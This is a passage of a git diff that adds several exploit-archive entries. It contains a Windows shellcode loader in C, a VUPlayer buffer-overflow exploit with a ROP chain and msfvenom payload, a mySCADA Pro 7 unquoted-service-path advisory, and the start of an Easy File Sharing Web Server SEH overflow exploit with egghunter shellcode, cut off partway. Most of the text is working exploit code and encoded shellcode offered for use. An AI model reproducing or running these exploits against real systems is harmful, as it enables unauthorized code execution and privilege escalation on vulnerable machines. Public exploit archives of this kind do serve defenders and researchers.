shellcode[]="\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x31\xd2\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x89\xdf\x31\xc9\x68\x6c\x6f\x63\x41\x88\x4c\x24\x03\x68\x61\x6c\x41\x6c\x68\x47\x6c\x6f\x62\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\xb1\x20\x51\x31\xc9\x51\xff\xd0\x89\xf1\x89\xc6\x89\x0e\x31\xc9\x68\x65\x65\x41\x41\x88\x4c\x24\x02\x68\x61\x6c\x46\x72\x68\x47\x6c\x6f\x62\x54\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x04\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x08\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x72\x74\x2e\x64\x68\x6d\x73\x76\x63\x54\xff\xd0\x83\xc4\x0c\x89\xc7\x31\xc9\x51\x68\x74\x66\x5f\x73\x68\x70\x72\x69\x6e\x54\x50\x8b\x16\xff\xd2\x83\xc4\x08\x89\x46\x0c\x31\xc9\x51\x68\x65\x78\x69\x74\x54\x57\x8b\x16\xff\xd2\x83\xc4\x08\x89\x46\x10\x8b\x56\x08\x31\xc9\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6b\x33\x32\x2e\x68\x77\x73\x6f\x63\x54\xff\xd2\x83\xc4\x0c\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x88\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50\x8b\x16\xff\xd2\x89\x46\x14\x83\xc4\x0c\x68\x65\x74\x41\x41\x31\xc9\x88\x4c\x24\x02\x68\x73\x6f\x63\x6b\x54\x57\x8b\x16\xff\xd2\x89\x46\x18\x83\xc4\x08\x68\x65\x63\x74\x41\x31\xc9\x88\x4c\x24\x03\x68\x63\x6f\x6e\x6e\x54\x57\x8b\x16\xff\xd2\x83\xc4\x08\x89\x46\x1c\x31\xc9\x68\x6b\x65\x74\x41\x88\x4c\x24\x03\x68\x65\x73\x6f\x63\x68\x63\x6c\x6f\x73\x54\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x08\x8b\x56\x14\x31\xc9\x66\xb9\x90\x01\x29\xcc\x66\xb9\x02\x02\x8d\x1c\x24\x53\x51\xff\xd2\x31\xff\x31\xd2\xb2\x06\x52\x83\xea\x05\x52\x42\x52\x8b\x56\x18\xff\xd2\x89\xc3\x31\xd2\x52\x52\x52\x52\x31\xc0\xb0\xff\x40\xf7\xe7\xc6\x04\x24\x02\x89\x44\x24\x02\x8d\x14\x24\x31\xc9\xb1\x10\x53\x51\x52\x53\x8b\x46\x1c\xff\xd0\x5b\x83\xc4\x10\x31\xc9\x51\x68\x20\x20\x20\x0a\x68\x3e\x20\x25\x64\x68\x25\x64\x20\x2d\x54\x59\x50\x57\x51\x8b\x46\x0c\xff\xd0\x83\xc4\x10\x53\x8b\x46\x08\xff\xd0\x47\x83\xff\x65\x75\x9a\x8b\x46\x04\x8b\x7e\x10\x56\xff\xd0\x50\xff\xd7"; + + + +main() +{ + +printf("shellcode length %ld\n",(unsigned)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/windows/local/40172.py b/platforms/windows/local/40172.py new file mode 100755 index 000000000..d120d3514 --- /dev/null +++ b/platforms/windows/local/40172.py @@ -0,0 +1,62 @@ +#!/usr/bin/python + +import os,sys + +#Tested Windows 7 Home x86 & Windows 10 Home x86_x64 + +#badchars \x00\x0a\x1a\x20\x40 +#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a\x20\x40" -f python + +buf = "" +buf += "\xbf\x3b\x99\xdd\xa3\xdb\xc4\xd9\x74\x24\xf4\x58\x29" +buf += "\xc9\xb1\x33\x31\x78\x12\x03\x78\x12\x83\xfb\x9d\x3f" +buf += "\x56\x07\x75\x36\x99\xf7\x86\x29\x13\x12\xb7\x7b\x47" +buf += "\x57\xea\x4b\x03\x35\x07\x27\x41\xad\x9c\x45\x4e\xc2" +buf += "\x15\xe3\xa8\xed\xa6\xc5\x74\xa1\x65\x47\x09\xbb\xb9" +buf += "\xa7\x30\x74\xcc\xa6\x75\x68\x3f\xfa\x2e\xe7\x92\xeb" +buf += "\x5b\xb5\x2e\x0d\x8c\xb2\x0f\x75\xa9\x04\xfb\xcf\xb0" +buf += "\x54\x54\x5b\xfa\x4c\xde\x03\xdb\x6d\x33\x50\x27\x24" +buf += "\x38\xa3\xd3\xb7\xe8\xfd\x1c\x86\xd4\x52\x23\x27\xd9" +buf += "\xab\x63\x8f\x02\xde\x9f\xec\xbf\xd9\x5b\x8f\x1b\x6f" +buf += "\x7e\x37\xef\xd7\x5a\xc6\x3c\x81\x29\xc4\x89\xc5\x76" +buf += "\xc8\x0c\x09\x0d\xf4\x85\xac\xc2\x7d\xdd\x8a\xc6\x26" +buf += "\x85\xb3\x5f\x82\x68\xcb\x80\x6a\xd4\x69\xca\x98\x01" +buf += "\x0b\x91\xf6\xd4\x99\xaf\xbf\xd7\xa1\xaf\xef\xbf\x90" +buf += "\x24\x60\xc7\x2c\xef\xc5\x37\x67\xb2\x6f\xd0\x2e\x26" +buf += "\x32\xbd\xd0\x9c\x70\xb8\x52\x15\x08\x3f\x4a\x5c\x0d" +buf += "\x7b\xcc\x8c\x7f\x14\xb9\xb2\x2c\x15\xe8\xd0\xb3\x85" +buf += "\x70\x39\x56\x2e\x12\x45" + +rop = "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] +rop += "\x5c\xe2\x60\x10" #ptr to &VirtualProtect() [IAT BASSMIDI.dll] +rop += "\xf1\xea\x01\x10" #MOV EAX,DWORD PTR DS:[EAX] # RTN [BASS.dll] +rop += "\x50\x09\x03\x10" #XCHG EAX,ESI # RETN [BASS.dll] +rop += "\x0c\x80\x60\x10" #POP EBP # RETN 0x0C [BASSMIDI.dll] +rop += "\x9f\x53\x10\x10" #& jmp esp BASSWMA.dll +rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] +rop += "\x90"*12 +rop += "\xff\xfd\xff\xff" #201 in negative +rop += "\xb4\x4d\x01\x10" #NEG EAX # RETN [BASS.dll] +rop += "\x72\x2f\x03\x10" #XCHG EAX,EBX # RETN [BASS.dll] +rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] +rop += "\xc0\xff\xff\xff" #40 in negative +rop += "\xb4\x4d\x01\x10" #NEG EAX # RETN [BASS.dll] +rop += "\x6c\x8a\x03\x10" #XCHG EAX,EDX # RETN [BASS.dll] +rop += "\x07\x10\x10\x10" #POP ECX # RETN [BASSWMA.dll] +rop += "\x93\x83\x10\x10" #&Writable location [BASSWMA.dll] +rop += "\x04\xdc\x01\x10" #POP EDI # RETN [BASS.dll] +rop += "\x84\xa0\x03\x10" #RETN [BASS.dll] +rop += "\xe7\x5f\x01\x10" #POP EAX # RETN [BASS.dll] +rop += "\x90"*4 +rop += "\xa5\xd7\x01\x10" #PUSHAD # RETN [BASS.dll] + + +exploit = "\x41"*1012 + rop + "\x90"*8 + buf + +print "len + " + str(len(rop)) + +file = open('/root/Desktop/exploit_development/VUPlayer/boom.pls','w') +file.write(exploit) +file.close() + + diff --git a/platforms/windows/local/40173.txt b/platforms/windows/local/40173.txt new file mode 100755 index 000000000..89ba7228c --- /dev/null +++ b/platforms/windows/local/40173.txt @@ -0,0 +1,40 @@ +mySCADAProv7 Local Privilege Escalation + +Vendor: mySCADA Technologies s.r.o. +Product web page: https://www.myscada.org/ +Affected application: myscadaPro +Affected version: v7 (Current version) + +Vulnerability discovered by: Karn Ganeshen + +Description: + +myscadaPro7 application installs seven (8) services. All these services run as LocalSystem by default, and suffer from an unquoted search path issue. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. + + +Tested on: + +Microsoft Windows Vista Ultimate SP2 (EN) + + +Details + +The following services have insecurely quoted paths: + +1. Bonjour Service (Bonjour Service) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mDNSResponder.exe: + +2. myalerting (myalerting) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myalerting.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" -m \"C:\ProgramData\mySCADA\msmtp.conf\" -s \"C:\ProgramData\mySCADA\sms.conf\" ": + +3. myscadacom (myscadacom) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadacom.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ": + +4. myscadadb (myscadadb) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadadb.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ": + +5. myscadagate (myscadagate) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadagate.exe\" -f \"C:\ProgramData\mySCADA\myscada.conf\" ": + +6. myscadahmi (myscadahmi) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadahmi.exe\" -p \"C:\Program Files\mySCADA\" -c \"conf\hmi.conf\" ": + +7. myscadalog (myscadalog) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadalog.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ": + +8. myscadascr (myscadascr) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\node.exe\" \"C:\Program Files\mySCADA\bin\scripts\scripts.js\" -c \"C:\ProgramData\mySCADA\myscada.conf\" -a 1 ": diff --git a/platforms/windows/remote/40178.py b/platforms/windows/remote/40178.py new file mode 100755 index 000000000..a9675a1e4 --- /dev/null +++ b/platforms/windows/remote/40178.py @@ -0,0 +1,85 @@ +#!/usr/bin/python +# Exploit Title: Easy File Sharing Web Server 7.2 SEH Overflow with Egghunter +# Date: July 29, 2016 +# Exploit Author: ch3rn0byl +# Vendor Homepage: http://www.sharing-file.com/ +# Software Link: http://www.sharing-file.com/download.php +# Version: 7.2 +# Tested on: Windows 7, 8, 8.1, 10 +# Admin privileges anyone?? hehe ;) + +from socket import socket, AF_INET, SOCK_STREAM +from sys import argv +from struct import pack +from time import sleep +from subprocess import call + +host = argv[1] + +rekt = "" +rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90" +rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb" +rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12" +rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc" +rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29" +rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34" +rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6" +rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82" +rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae" +rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80" +rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa" +rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03" +rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69" +rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48" +rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf" +rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec" +rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77" +rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3" +rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83" +rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69" +rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1" +rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0" +rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea" +rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76" +rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55" +rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a" +rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81" +rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14" +rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09" + +# Our tag is hive: \x68\x69\x76\x65 + +egghunter = '' +egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c' +egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75' +egghunter += '\xea\xaf\x75\xe7\xff\xe7' + +crash = "A" * 4061 +crash += pack('